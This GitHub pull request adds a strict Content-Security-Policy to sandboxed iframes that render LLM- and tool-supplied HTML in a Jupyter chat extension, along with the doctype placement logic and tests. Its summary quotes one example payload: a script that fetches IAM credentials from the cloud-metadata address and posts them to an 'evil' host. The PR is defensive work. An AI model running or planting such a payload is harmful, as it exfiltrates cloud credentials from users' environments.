Skip to content

security: inject strict CSP into HTMLFrame blob document#297

Open
pjdoland wants to merge 2 commits into
plmbr:mainfrom
pjdoland:fix/htmlframe-csp
Open

security: inject strict CSP into HTMLFrame blob document#297
pjdoland wants to merge 2 commits into
plmbr:mainfrom
pjdoland:fix/htmlframe-csp

Conversation

@pjdoland
Copy link
Copy Markdown
Collaborator

@pjdoland pjdoland commented May 18, 2026

Summary

ChatResponseHTMLFrame (src/chat-sidebar.tsx) renders LLM and MCP-tool-supplied HTML inside <iframe sandbox="allow-scripts" src={blobUrl}>. The blob URL is null-origin so cookies and parent DOM are unreachable, but allow-scripts without allow-same-origin still permits fetch() against any URL the user's browser can reach: 169.254.169.254 cloud-metadata, cluster intranet hosts, the Jupyter server's own API.

A poisoned tool result like <script>fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/').then(r=>r.text()).then(t=>fetch('//evil/x',{method:'POST',body:t}))</script> runs inside the null-origin iframe and freely talks out to the LAN, cloud metadata, and any internal endpoint reachable from the pod. The blob's null origin doesn't constrain egress (CORS only governs reads, not side-effects).

Solution

Inject a Content-Security-Policy <meta> tag at the top of every HTMLFrame blob via a new src/html-frame-csp.ts helper:

default-src 'none';
script-src 'unsafe-inline'; style-src 'unsafe-inline';
img-src data:; font-src data:;
connect-src 'none'; frame-src 'none'; child-src 'none';
worker-src 'none'; manifest-src 'none'; media-src 'none';
object-src 'none'; form-action 'none'; base-uri 'none';

Inline scripts and styles stay enabled: most LLM/tool HTML output (matplotlib, plotly offline export, custom dashboards) is self-contained inline. Image and font loads are restricted to data: URIs so embedded visualizations still render. Every network sink is closed: fetch, XHR, WebSocket, EventSource, sendBeacon, <img> external loads, <a ping>, Workers, Service Workers, <embed>, <object>, <base> rewrites, form submissions. The <iframe sandbox> already omits allow-top-navigation and allow-popups, so the parent window can't be redirected for exfil.

The meta is almost always prepended rather than spliced into <head>: an HTML-naive regex can be fooled by <head> inside a comment, <noscript>, <textarea>, or a CDATA-looking blob, which would leave the real <head> running unguarded. The one exception is a leading <!DOCTYPE> declaration: a doctype has to remain at position zero or the document parses in quirks mode, which breaks the CSS that matplotlib/plotly emit (and weakens CSP enforcement details in older WebKit). When a doctype is detected (allowing for an optional BOM and leading whitespace), the meta is spliced in immediately AFTER the doctype rather than before it. A comment-disguised doctype is not a real doctype and the regex skips it, matching the browser's own ignoring of comment-wrapped doctypes.

Testing

  • tests/ts/html-frame-csp.test.ts: 14 cases covering directive coverage, prepend semantics (no <head>, author-supplied <head>, <head> hidden in a comment, comment-disguised doctype), DOCTYPE placement (with and without BOM + leading whitespace), ordering relative to <script>, and the idempotency caveat (two metas are harmless, strictest wins).
  • Full suites: pytest passes, tsc clean, prettier clean, jest clean.

Risks / follow-ups

  • Behavior change: tool HTML that depends on a CDN-hosted JS or CSS will stop loading. Plotly offline export is unaffected (inline). Plotly CDN mode, externally hosted matplotlib widgets, or any tool that fetches data from a public API will break. The previous behavior gave those tools full LAN reach; the cost of closing the SSRF/exfil path is that those tools now need to be configured for inline-only output.
  • Out of scope follow-ups, worth a separate ticket:
    • An NBI_HTMLFRAME_CSP_EXTRA admin-policy env var that appends additional sources (e.g., connect-src https://cdn.plot.ly) for deployments that want to permit specific trusted CDNs.
    • The useMemo([]) in ChatResponseHTMLFrame caches the blob URL on mount and never recomputes when props.source changes. Pre-existing; not introduced here. Safe in practice because each streamed HTMLFrame gets a distinct React key.
    • URL.createObjectURL in ChatResponseHTMLFrame is never paired with URL.revokeObjectURL. Pre-existing leak; not introduced here. Long chat sessions accumulate blob URLs until the document unloads.

ChatResponseHTMLFrame renders LLM/MCP-supplied HTML in an iframe with
sandbox="allow-scripts" backed by a blob: URL. The blob URL has a null
origin so cookies and parent DOM are unreachable, but allow-scripts
without same-origin still permits fetch() to any URL the user's browser
can reach: 169.254.169.254 cloud metadata, cluster intranet hosts, the
Jupyter server's own API. A poisoned tool result could ship a script that
exfils metadata or pivots SSRF against the JupyterHub pod network.

Inject a Content-Security-Policy meta tag at the top of every HTMLFrame
blob via a new src/html-frame-csp.ts helper. The policy keeps inline
scripts and styles enabled (matplotlib, plotly offline mode, custom
dashboards typically inline everything they need), allows only data:
images and fonts, and zeroes out every network sink: connect-src,
frame-src, child-src, worker-src, manifest-src, media-src, object-src,
form-action, base-uri. The meta is always prepended rather than spliced
into <head>: an HTML-naive regex can be fooled by <head> inside a
comment or noscript, which would let the real <head> run unguarded.
Browsers fold a leading meta into the synthetic <head> ahead of any
author-supplied tag, so prepend is both simpler and safer.
@pjdoland pjdoland added the bug Something isn't working label May 18, 2026
@pjdoland
Copy link
Copy Markdown
Collaborator Author

The behavior change here makes me a little nervous. This might be something for AFTER 5.0. @mbektas

Second-pass review surfaced a quirks-mode regression: the always-prepend
strategy put the CSP meta tag ahead of any leading `<!DOCTYPE html>`,
which causes the browser parser to drop into quirks mode. Quirks mode
breaks the CSS that matplotlib/plotly emit (and, in older WebKit, weakens
some CSP enforcement details).

Detect a leading doctype (with optional BOM and whitespace) and slot
the meta immediately AFTER it instead of before. Comment-disguised
doctypes (`<!-- <!DOCTYPE html> -->`) are not real doctypes and the
regex correctly skips them, matching the browser's own ignoring of
comment-wrapped doctypes.

Tests pin (a) doctype-prefixed input keeps the doctype at position
zero and slots the meta after, (b) BOM + leading whitespace before the
doctype still works, (c) comment-disguised doctype is not matched and
the meta goes at the start. Replaces the previous "meta before
DOCTYPE" test which was actively wrong.
@mbektas mbektas added this to the 5.1.x milestone May 19, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

bug Something isn't working

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants